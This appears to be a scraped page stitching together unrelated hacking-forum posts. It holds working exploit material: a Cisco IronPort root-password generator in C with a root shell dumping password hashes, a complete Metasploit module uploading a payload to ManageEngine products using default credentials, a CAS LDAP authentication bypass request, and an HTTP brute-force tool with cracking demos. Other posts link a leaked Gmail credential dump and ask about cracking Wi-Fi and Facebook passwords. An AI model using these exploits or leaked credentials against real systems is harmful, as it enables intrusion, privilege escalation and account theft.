/* Cisco Ironport Appliances Privilege Escalation Vulnerability Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.5.5-280 Cisco Ironport WSA - AsyncOS 8.0.5-075 Cisco Ironport SMA - AsyncOS 8.3.6-0 Date: 22/05/2014 Credits: Glafkos Charalambous CVE: Not assigned by Cisco Disclosure Timeline: 19-05-2014: Vendor Notification 20-05-2014: Vendor Response/Feedback 27-08-2014: Vendor Fix/Patch 24-01-2015: Public Disclosure Description: Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation. By enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations. The vulnerability is due to weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support. Vendor Response: As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting better the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator set the pass-phrase and enable the account. [SD] Note: Administrative credentials are needed in order to activate the access to support representative and to set up the pass-phrase that it is used to compute the final password. [GC] Still Admin user has limited permissions on the appliance and credentials can get compromised too, even with default password leading to full root access. [SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011 for the SMA by Cisco bug id: CSCuo96056 and for WSA by Cisco bug id CSCuo90528 Technical Details: By logging in to the appliance using default password "ironport" or user specified one, there is an option to enable Customer Support Remote Access. This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service. Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance. Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc. PoC: Enable Service Account ---------------------- root@kali:~# ssh -lenablediag 192.168.0.158 Password: Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163 Copyright (c) 2001-2013, Cisco Systems, Inc. AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance Available Commands: help -- View this text. quit -- Log out. service -- Enable or disable access to the service system. network -- Perform emergency configuration of the diagnostic network interface. clearnet -- Resets configuration of the diagnostic network interface. ssh -- Configure emergency SSH daemon on the diagnostic network interface. clearssh -- Stop emergency SSH daemon on the diagnostic network interface. tunnel -- Start up tech support tunnel to IronPort. print -- Print status of the diagnostic network interface. reboot -- Reboot the appliance. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently disabled. ironport.example.com> service Service Access is currently disabled. Enabling this system will allow an IronPort Customer Support representative to remotely access your system to assist you in solving your technical issues. Are you sure you want to do this? [Y/N]> Y Enter a temporary password for customer support to use. This password may not be the same as your admin password. This password will not be able to be used to directly access your system. []> cisco123 Service access has been ENABLED. Please provide your temporary password to your IronPort Customer Support representative. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently ENABLED (0 current service logins) ironport.example.com> Generate Service Account Password --------------------------------- Y:\Vulnerabilities\cisco\ironport>woofwoof.exe Usage: woofwoof.exe -p password -s serial -p <password> | Cisco Service Temp Password -s <serial> | Cisco Serial Number -h | This Help Menu Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4 Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019 F508A4 Service Password: b213c9a4 Login to the appliance as Service account with root privileges -------------------------------------------------------------- root@kali:~# ssh -lservice 192.168.0.158 Password: Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10 Copyright (c) 2001-2013, Cisco Systems, Inc. AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance # uname -a FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64 # cat /etc/master.passwd # $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $ root:*:0:0::0:0:Mr &:/root:/sbin/nologin service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin operator:*:2:5::0:0:System &:/:/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include "md5.h" #include "getopt.h" #define MAX_BUFFER 128 #define SECRET_PASS "woofwoof" void usage(char *name); void to_lower(char *str); void fuzz_string(char *str); int main(int argc, char *argv[]) { if (argc < 2) { usage(argv[0]); } int opt; int index; char *temp_pass = { 0 }; char *serial_no = { 0 }; char *secret_pass = SECRET_PASS; char service[MAX_BUFFER] = { 0 }; unsigned char digest[16] = { 0 }; while ((opt = getopt(argc, argv, "p:s:h")) != -1) { switch (opt) { case 'p': temp_pass = optarg; break; case 's': serial_no = optarg; break; case 'h': usage(argv[0]); break; default: printf_s("Wrong Argument: %s\n", argv[1]); break; } } for (index = optind; index < argc; index++) { usage(argv[0]); exit(0); } if (temp_pass == NULL || serial_no == NULL) { usage(argv[0]); exit(0); } if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) { to_lower(serial_no); fuzz_string(temp_pass); strcpy_s(service, sizeof(service), temp_pass); strcat_s(service, sizeof(service), serial_no); strcat_s(service, sizeof(service), secret_pass); MD5_CTX context; MD5_Init(&context); MD5_Update(&context, service, strlen(service)); MD5_Final(digest, &context); printf_s("Service Password: "); for (int i = 0; i < sizeof(digest)-12; i++) printf("%02x", digest[i]); } return 0; } void fuzz_string(char *str) { while (*str){ switch (*str) { case '1': *str = 'i'; break; case '0': *str = 'o'; break; case '_': *str = '-'; break; } str++; } } void to_lower(char *str) { while (*str) { if (*str >= 'A' && *str <= 'Z') { *str += 0x20; } str++; } } void usage(char *name) { printf_s("\nUsage: %s -p password -s serial\n", name); printf_s(" -p <password> | Cisco Service Temp Password\n"); printf_s(" -s <serial> | Cisco Serial Number\n"); printf_s(" -h | This Help Menu\n"); printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name); exit(0); } Source

Free BIOS Master Password Generator for Laptops

PHP Script to send and receive messages on WhatsApp I have been reading many tutorials for sending and receiving WhatsApp Messages via PHP but there is not a single Article Which explains properly with Steps that How To retrieve Your WhatsApp password Which is created and Stored when you create a WhatsApp Account on the WhatsApp Server which is the main Challenge as of now in other Articles. Thanks To this tool Which has Made 50% of the work Easy. https://github.com/shirioko/WART Okay So we will Quickly go through the Steps for WhatsApp Registration Tool : Go To the link https://github.com/shirioko/WART Download The Whole project by Clicking Clone to Desktop Run the WART-1.7.3.0 Exe File WART Enter Phone Number with Country Code (e.g. India Number : 91xxxxxxxxxx) P.s. Do not put any Special Symbol like (+91) for India Click on Request Code and You will Receive a Code from WhatsApp on the Entered Mobile Number. Now Verify that Code in 2nd Step and That’s it . You are here . Your password will Appear. P.s. Do not Share your password with Anyone Because it Can be used in loop for any Kind of messages. okay Now we are done with 50% of the task . Now we need to write the php Script Which will Send Messages to WhatsApp Registered Number. You will need 2 things for Sending Messages to WhatsApp through PHP : Username (WHICH IS YOUR MOBILE NUMBER WITH COUNTRY CODE) : 91xxxxxxxxxxx Password (Which You got From The WART.EXE TOOL Alright Sparky Lets Get this Done….. <?php require_once ‘./src/whatsprot.class.php’; $username = “919xxxxxxxxx”; //Mobile Phone prefixed with country code so for india it will be 91xxxxxxxx $password = “your password”; $w = new WhatsProt($username, 0, “Mayank Grover Blog”, true); //Name your application by replacing “WhatsApp Messaging” $w->connect(); $w->loginWithPassword($password); $target = ’91xxxxxxxxxxx’; //Target Phone,reciever phone $message = ‘Hello User !! This is a Tutorial for sending messages via php to WhatsApp Account’; $w->SendPresenceSubscription($target); //Let us first send presence to user $w->sendMessage($target,$message ); // Send Message echo “Message Sent Successfully”; ?> So Everything is Quite Clear in the above Script i.e. You need to set your Application Details Username as Mobile Number password Which you got from WART Tool Target as your Target Mobile Number and Lastly The message(Plain Text Which you need to send). Okay Now I know many Questions are Coming in your mind. In first line Require src/whatsprot.class.php What is This. ??? You Need to Download the WhatsApi from this Link . There You Will find the src directory with all the source files. Can we only Send Plain Text messages Or media like Images and Videos??? Yes we can send media file Also. So Next I will be writing php script to send Media file To any WhatsApp Account. SOURCE

=====[Alligator Security Team - Security Advisory]======== CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP authentication via crafted wildcards. Reporter: José Tozo < juniorbsd () gmail com > =====[Table of Contents]================================== 1. Background 2. Detailed description 3. Other contexts & solutions 4. Timeline 5. References =====[1. Background]====================================== CAS is an authentication system originally created by Yale University to provide a trusted way for an application to authenticate a user. =====[2. Detailed description]============================ A valid username and password required. Given a username johndoe and a password superpass, you can sucessfully achieve login using wildcards: username: jo* password: superpass The login will be sucessfully only if the ldap bind search return one unique member. The vulnerability described in this document can be validated using the following example: Client Request: root@machine:/# curl -k -L -d "username=jo%2A&password=superpass" https://login.cas-server.com/v1/tickets (note that * was url encoded to %2A) <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>201 The request has been fulfilled and resulted in a new resource being created</title> </head> <body> <h1>TGT Created</h1> <form action=" https://xxx.xxx.xxx.xxx/v1/tickets/TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz" method="POST">Service:<input type="text" name="service" value=""><br><input type="submit" value="Submit"></form> </body> </html> Server log: ============================================================= WHO: [username: jo*] WHAT: TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz ACTION: TICKET_GRANTING_TICKET_CREATED APPLICATION: CAS WHEN: Tue Jan 20 18:38:17 BRST 2015 CLIENT IP ADDRESS: xxx.xxx.xxx.xxx SERVER IP ADDRESS: xxx.xxx.xxx.xxx ============================================================= =====[3. Other contexts & solutions]====================== In order to apply the patch, you have to update at least to version 3.5.3. Newer versions, such as CAS 4.0.0 and above, are not vulnerable. =====[4. Timeline]======================================== 29/12/14 Vendor notification. 14/01/15 Vendor rolled out new version 3.5.3 17/01/15 Mitre assigned CVE-2015-1169. 21/01/15 Disclosure date. =====[5. References]======================================= 1 - https://github.com/Jasig/cas/pull/411 2 - https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c -- Grato, Tozo Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ManageEngine Multiple Products Authenticated File Upload', 'Description' => %q{ This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk, AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts the upload does not handle correctly '../' sequences, which can be abused to write in the file system. Authentication is needed to exploit this vulnerability, but this module will attempt to login using the default credentials for the administrator and guest accounts. Alternatively you can provide a pre-authenticated cookie or a username / password combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer, SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been been tested successfully in Windows and Linux on several versions. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-5301'], ['OSVDB', '116733'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => false, # Privileged on Windows but not on Linux targets 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Automatic', { } ], [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9', { 'attachment_path' => '/workorder/Attachment.jsp' } ], [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1', { 'attachment_path' => '/common/FileAttachment.jsp' } ], [ 'IT360 v8-v10.4', { 'attachment_path' => '/common/FileAttachment.jsp' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 15 2014')) register_options( [ Opt::RPORT(8080), OptString.new('JSESSIONID', [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']), OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']), OptString.new('USERNAME', [true, 'The username to login as', 'guest']), OptString.new('PASSWORD', [true, 'Password for the specified username', 'guest']), OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to']) ], self.class) end def get_version res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360) version = [ 9999, 9999, 0, 'sd' ] if res && res.code == 200 if res.body.to_s =~ /ManageEngine ServiceDesk/ if res.body.to_s =~ / \| ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ output = $1 version = [output[0].to_i, output[2].to_i, '0', 'sd'] end if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/ # newer builds version[2] = $1.to_i elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # older builds version[2] = $1.to_i end elsif res.body.to_s =~ /ManageEngine AssetExplorer/ if res.body.to_s =~ /ManageEngine AssetExplorer ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ || res.body.to_s =~ /<div class="login-versioninfo">version ([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/ output = $1 version = [output[0].to_i, output[2].to_i, 0, 'ae'] end if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/ version[2] = $1.to_i end elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/ # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version version[3] = 'sc' if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # ... but get the build number if we can find it version[2] = $1.to_i end elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/ # IT360 newer versions version[3] = 'it' end elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/ # IT360 older versions, not a very good detection string but there is no alternative? version[3] = 'it' end version end def check version = get_version # TODO: put fixed version on the two ifs below once (if...) products are fixed # sd was fixed on build 9031 # ae and sc still not fixed if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') || (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') || (version[3] == 'sc' && version[2] < 99999) return Exploit::CheckCode::Appears end if (version[2] > 9030 && version[3] == 'sd') || (version[2] > 99999 && version[3] == 'ae') || (version[2] > 99999 && version[3] == 'sc') return Exploit::CheckCode::Safe else # An IT360 check always lands here, there is no way to get the version easily return Exploit::CheckCode::Unknown end end def authenticate_it360(port, path, username, password) if datastore['DOMAIN_NAME'] == nil vars_post = { 'LOGIN_ID' => username, 'PASSWORD' => password, 'isADEnabled' => 'false' } else vars_post = { 'LOGIN_ID' => username, 'PASSWORD' => password, 'isADEnabled' => 'true', 'domainName' => datastore['DOMAIN_NAME'] } end res = send_request_cgi({ 'rport' => port, 'method' => 'POST', 'uri' => normalize_uri(path), 'vars_get' => { 'service' => 'ServiceDesk', 'furl' => '/', 'timestamp' => Time.now.to_i }, 'vars_post' => vars_post }) if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed" return res.get_cookies else return nil end end def get_it360_cookie_name res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("/") }) cookie = res.get_cookies if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/ return $1 else return nil end end def login_it360 # Do we already have a valid cookie? If yes, just return that. if datastore['IAMAGENTTICKET'] cookie_name = get_it360_cookie_name cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';' return cookie end # get the correct path, host and port res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/') }) if res && res.redirect? uri = [ res.redirection.port, res.redirection.path ] else return nil end cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) if cookie != nil return cookie elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil # we've tried with the default guest password, now let's try with the default admin password cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator') if cookie != nil return cookie else # Try one more time with the default admin login for some versions cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin') if cookie != nil return cookie end end end nil end # # Authenticate and validate our session cookie. We need to submit credentials to # j_security_check and then follow the redirect to HomePage.do to create a valid # authenticated session. # def authenticate(cookie, username, password) res = send_request_cgi!({ 'method' => 'POST', 'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')), 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => cookie, 'vars_post' => { 'j_username' => username, 'j_password' => password, 'logonDomainName' => datastore['DOMAIN_NAME'] } }) if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/)) # sd and ae respond with 302 while sc responds with a 200 return true else return false end end def login # Do we already have a valid cookie? If yes, just return that. if datastore['JSESSIONID'] != nil cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';' return cookie end # First we get a valid JSESSIONID to pass to authenticate() res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/') }) if res && res.code == 200 cookie = res.get_cookies authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD']) if authenticated return cookie elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil # we've tried with the default guest password, now let's try with the default admin password authenticated = authenticate(cookie, 'administrator', 'administrator') if authenticated return cookie else # Try one more time with the default admin login for some versions authenticated = authenticate(cookie, 'admin', 'admin') if authenticated return cookie end end end end nil end def send_multipart_request(cookie, payload_name, payload_str) if payload_name =~ /\.ear/ upload_path = '../../server/default/deploy' else upload_path = rand_text_alpha(4+rand(4)) end post_data = Rex::MIME::Message.new if @my_target == targets[1] # old style post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"") post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"") post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"") post_data.add_part('', nil, nil, "form-data; name=\"vec\"") post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"") post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"") post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"") post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"") else post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"") post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"") post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"") end data = post_data.to_s res = send_request_cgi({ 'uri' => normalize_uri(@my_target['attachment_path']), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => cookie }) return res end def pick_target return target if target.name != 'Automatic' version = get_version if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') || (version[0] == 4 && version[3] == 'ae') || (version[3] == 'sc') # These are all "old style" versions (sc is always old style) return targets[1] elsif version[3] == 'it' return targets[3] else return targets[2] end end def exploit if check == Exploit::CheckCode::Safe fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable") end print_status("#{peer} - Selecting target...") @my_target = pick_target print_status("#{peer} - Selected target #{@my_target.name}") if @my_target == targets[3] cookie = login_it360 else cookie = login end if cookie.nil? fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate") end # First we generate the WAR with the payload... war_app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => war_app_base }) # ... and then we create an EAR file that will contain it. ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4)) app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" app_xml << '<application>' app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>" app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>" app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>" # Zipping with CM_STORE to avoid errors while decompressing the zip # in the Java vulnerable application ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) ear_file.add_file(war_app_base + '.war', war_payload.to_s) ear_file.add_file('META-INF/application.xml', app_xml) ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear' if @my_target != targets[3] # Linux doesn't like it when we traverse non existing directories, # so let's create them by sending some random data before the EAR. # (IT360 does not have a Linux version so we skip the bogus file for it) print_status("#{peer} - Uploading bogus file...") res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4))) if res && res.code != 200 fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed") end end # Now send the actual payload print_status("#{peer} - Uploading EAR file...") res = send_multipart_request(cookie, ear_file_name, ear_file.pack) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end Source : ManageEngine Multiple Products Authenticated File Upload ? Packet Storm

salut tuturor. am o problema si anume cu Reaver pt o retea WPA...reincearca la nesfarsit aceeasi parola 012345670. culmea la wpa2 nu face asa...care sa fie problema?

According to the Daily Dot, nearly 5 million usernames and passwords to Gmail accounts have been leaked on a Russian Bitcoin forum. Here's what you should know. The list has since been taken down, and there's no evidence that Gmail itself was hacked—just that these passwords have been leaked. Most sources are saying that lots of the information is quite old, so chances are they were leaked long ago—though others are claiming 60% of the passwords are still valid (not to mention really, really horrible). Source: LikeHacker Download link: google_5000000.7z — RGhost — file sharing

Care stie cum pot decripta parola facebook - gen - 301b9c4c93ef05f347d052fa40f80c64c5fb0b94 ?

Description: MorXBrute is a customizable HTTP dictionary-based password cracking tool written in Perl. MorXBrute comes with a few payloads for some of the most popular softwares and additionally let you add your own payload for your favorite HTTP software or website. MorXBrute supports both GET and POST brute forcing. MorXBrute was written for educational, demonstration and testing purposes only. Author cannot be held responsible for any malicious use or damage. You can redistribute it and/or modify it under the same terms as Perl itself. Author: Simo Ben youssef <Simo_at_morxploit_dot_com> MorXploit Research Version: MorXBrute v1.01 Beta MD5: b4ea3c6895b9996b72309cc91a5910f8 Release date: November 08 2013 Download: Link 1 Link 2 Requirements: Perl 5 or older Additional modules: None Usage: perl MorXBrute.pl <target:port> <user> <wordlist> <payload file> perl MorXBrute.pl localhost:80 admin password.lst payloads/wordpressv3.7.1 perl MorXBrute.pl update Payloads: As of version 1.01 MorXBrute includes payloads for: Bitrix cPanel everyone email platform Horde Moodle Wordpress Xoops Zimbra However the goal of MorXBrute is to be a customizable HTTP brute forcing tool by giving you the ability to create your own payloads and share them with others, please read below and feel free to contact me if you need help. How to generate Payloads: Generating your own payload for your target requires a little work, right now MorXBrute can’t do that for you, but I’m considering to add a payload generator in the future. MorXBrute works by sending either a POST or GET request to the target with the login and pass and any other data as required by the target script, MorXBrute proceeds then to read the server’s response for each request. The server’s response changes just as login parameters, but in most cases, after successful authentication, the server responds with a HTTP/1.1 302 Found and redirects the browser to a new location. In this case MorXBrute uses the regex Location: (.*) to distinguish between a successful and a failed login attempt. In some other cases, some scripts like joomla will assign a cookie and redirects you to the administration page either way, before the script validates login cookie. This makes brute forcing slower and is not supported by MorXBrute. First you will need a network sniffer or if you use Google Chrome you can use the built-in network sniffer in the Developer tools (CTRL + Shift + i). Personally I prefer to use ngrep which can be downloaded from: ngrep - network grep or apt-get install ngrep on Debian/Ubuntu and yum install ngrep on Red Hat/Fedora/Centos You can then run it to capture your target traffic to analyze by running: ngrep -q -d interface -W byline host target and port 80 > target.log ngrep -q -d wlan0 -W byline host mywordpresssite.com and port 80 > wordpress.log At the login page, send two requests, one with valid login credentiels and second with false login credentiels. Once done go back and check your ngrep logs and gather the following (in wordpress example). login script path: POST /wp-login.php Or when GET is used (not in wordpress case) GET /someotherscript.php posted data log=admin&pwd=somelamepassword&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.testserver%2Fwp-admin%2F&testcookie=1 or log=admin&pwd=somelamepassword when GET is used (again not in word press case) GET /someotherscript.php?log=admin&pwd=somelamepassword on the successful login attempt log check the rest of the response headers to see if the server responded with a new location Example: Set-Cookie: wordpress_logged_in_b376718910d75b03e67817ec5d3badc4=admin%7C1563339904%7Cba04510cfb75c0a5094246a6f150baee; path=/; httponly. Location: http://testserver/wp-admin/ <——– HERE Content-Length: 0 Connection: close On the failed login attempt log check also for the location response. If you can’t find the location response in the failed login log then bingo that’s the server telling you that your password works, and that’s our key! Otherwise and if the server responds with the same location either way then it’s probably trying to validate the newly assigned cookie on the next step. In some rare cases, some scripts use the main restricted area (admin panel/mailbox etc) script to process login requests in this case you can easily find the regex key by looking either at the cookie value (BITRIX_SM_LOGIN=admin in Bitrix case) or anything different in the HTML code, a welcome message (Welcome user to inbox as an example) and add it in the payload as Welcome(.*?)to Payload file structure: The structure is very simple, there are 4 values seperated by comma “,” 1- POST: HTTP method (could be either POST or GET) 2- login.php: the login script path Note: this is the full path, if your script is installed in a subdirectory then you should include that too for example if your wordpress is installed in http://localhost/wordpress then you should include it in the payload (POST:wordpress/wp-login.php) 3- login parameters (login and password) Note: $user and $pwd are used by MorXBrute and should not be changed 4- MorXploit: Cookie value, change if required by the remote login 5- Regex key POST,login.php,login=$user&password=$pwd,MorXploit,Location:(.*) Note: Although wordpress takes other data paremeters besides log and pwd such as redirect_to and testcookie, it only requires those first two. Demo: POST Method: root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl demo.opensourcecms.com:80 admin word.lst payloads/wordpressv3.7.1 =================================================== — MorXBrute v1.0 Beta HTTP password cracking tool — By Simo Ben youssef — www.morxploit.com =================================================== [*] target set to demo.opensourcecms.com:80 [*] user set to admin [*] Wordlist set to word.lst [*] payload set to payloads/wordpressv3.7.1 [+] Cracking … [-] test -> Failed [-] test123 -> Failed [-] testtest -> Failed [-] testest123 -> Failed [-] qwerty -> Failed [-] azerty -> Failed [-] password -> Failed [-] password123 -> Failed [-] x3demob -> Failed ============================================================ [+] CRACKED! Your password is demo123 [+] Found at line 10 of word.lst [+] Cracked in 6 seconds ============================================================ GET Method: root@MorXploit:/home/simo/MorXBrute# perl MorXBrute.pl x3demob.cpx3demo.com:2082 x3demob word.lst payloads/cpanelgetprov1.0 =================================================== — MorXBrute v1.0 Beta HTTP password cracking tool — By Simo Ben youssef — www.morxploit.com =================================================== [*] target set to x3demob.cpx3demo.com:2082 [*] user set to x3demob [*] Wordlist set to word.lst [*] payload set to payloads/cpanelgetprov1.0 [+] Cracking … [-] test -> Failed [-] test123 -> Failed [-] testtest -> Failed [-] testest123 -> Failed [-] qwerty -> Failed [-] azerty -> Failed [-] password -> Failed [-] password123 -> Failed ============================================================ [+] CRACKED! Your password is x3demob [+] Found at line 9 of word.lst [+] Cracked in 4 seconds ============================================================ TODO: Add SSL suport Add a payload generator And maybe more? Submit your payloads: Your contribution is needed! Please submit your payloads to 